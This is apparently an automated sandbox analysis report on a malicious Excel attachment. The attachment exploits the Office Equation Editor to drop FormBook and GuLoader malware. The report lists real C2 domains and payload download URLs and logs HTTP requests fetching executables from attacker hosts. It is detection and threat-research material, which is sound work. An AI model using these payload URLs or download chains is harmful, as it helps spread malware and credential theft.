Analysis Report Required Order Quantity.xlsx

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\system\svchost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\system\explorer.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\system\spoolsv.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\stsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Source: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}

Multi AV Scanner detection for submitted file

Source: Required Order Quantity.xlsx

ReversingLabs: Detection: 22%

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Windows\system\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\system\explorer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Joe Sandbox ML: detected
Source: C:\Windows\system\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\stsys.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 11.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.0.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.1.explorer.exe.2540000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.0.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.vbc.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.2.svchost.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.1.svchost.exe.1d90000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.1.vbc.exe.2c20000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.2.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.0.svchost.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49165 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe
Source:	Binary string: wuapp.pdb source: explorer.exe, 00000008.00000003.2221194170.000000000095A000.00000004.00000001.sdmp

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 67MB

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_00417143
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_00416130
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_004171D7
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_004179F2
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_00417190
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_0041725A
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp		4_2_004172E5

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: fqe.short.gy

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 52.59.165.42:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 52.59.165.42:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49168 -> 103.141.138.118:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: www.evolvekitchendesign.com/ffw/
Source: Malware configuration extractor	URLs: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 05:47:19 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Sun, 11 Apr 2021 22:43:28 GMTETag: "5cb48-5bfba202eca11"Accept-Ranges: bytesContent-Length: 379720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 31 6d fe f9 50 03 ad f9 50 03 ad f9 50 03 ad 7a 4c 0d ad f8 50 03 ad 90 4f 0a ad f3 50 03 ad 10 4f 0e ad f8 50 03 ad 52 69 63 68 f9 50 03 ad 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc af f7 4d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 02 00 00 30 00 00 00 00 00 00 70 36 00 00 00 10 00 00 00 c0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 02 00 00 10 00 00 c8 b1 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ac 02 00 28 00 00 00 00 e0 02 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 a7 02 00 00 10 00 00 00 b0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 1b 00 00 00 c0 02 00 00 10 00 00 00 c0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 05 00 00 00 e0 02 00 00 10 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 24 a7 91 47 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.141.138.118 103.141.138.118

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraingst.dns.army
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FB5DC01.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraingst.dns.army
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive

Found strings which match to known social media urls

Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: fqe.short.gy

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Mon, 12 Apr 2021 05:47:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

URLs found in memory or binary data

Source: vbc.exe	String found in binary or memory: http://103.141.138.118/bin_iOxAb78.bin
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.2187372005.0000000002CC0000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.2365850522.0000000000F70000.00000002.00000001.sdmp, icsys.icn.exe, 00000007.00000002.2187194391.0000000002C40000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2237647374.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000002.2236880993.0000000000901000.00000004.00000020.sdmp, explorer.exe, 00000008.00000002.2236780419.00000000008D8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236780419.00000000008D8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.giffi
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gif8X;E
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifr
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifr
Source: explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp, explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp, explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236727117.0000000000894000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif.exe
Source: explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif4
Source: explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifuVwzFlRdVmuMSmtmQbIqqyE
Source: explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/filesoLgFqAfjBmuVwzFlRdVmuMSmtmQbIqqyE
Source: explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif)
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2187372005.0000000002CC0000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.2365850522.0000000000F70000.00000002.00000001.sdmp, icsys.icn.exe, 00000007.00000002.2187194391.0000000002C40000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2237647374.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe	String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\Public\vbc.exe	Windows user hook set: 3004 mouse C:\Windows\system32\MSVBVM60.DLL			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Windows user hook set: 1464 mouse C:\Windows\system32\MSVBVM60.DLL			Jump to behavior
Source: C:\Windows\system\explorer.exe	Windows user hook set: 1688 mouse C:\Windows\system32\MSVBVM60.DLL			Jump to behavior
Source: C:\Windows\system\explorer.exe	Windows user hook set: 0 keyboard low level c:\windows\system\explorer.exe			Jump to behavior
Source: C:\Windows\system\explorer.exe	Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Windows user hook set: 1900 mouse C:\Windows\system32\MSVBVM60.DLL			Jump to behavior
Source: C:\Windows\system\svchost.exe	Windows user hook set: 620 mouse C:\Windows\system32\MSVBVM60.DLL			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Windows user hook set: 1440 mouse C:\Windows\system32\MSVBVM60.DLL

Installs a global mouse hook

Source: C:\Windows\system\explorer.exe

Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe

Jump to behavior

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Drops certificate files (DER)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
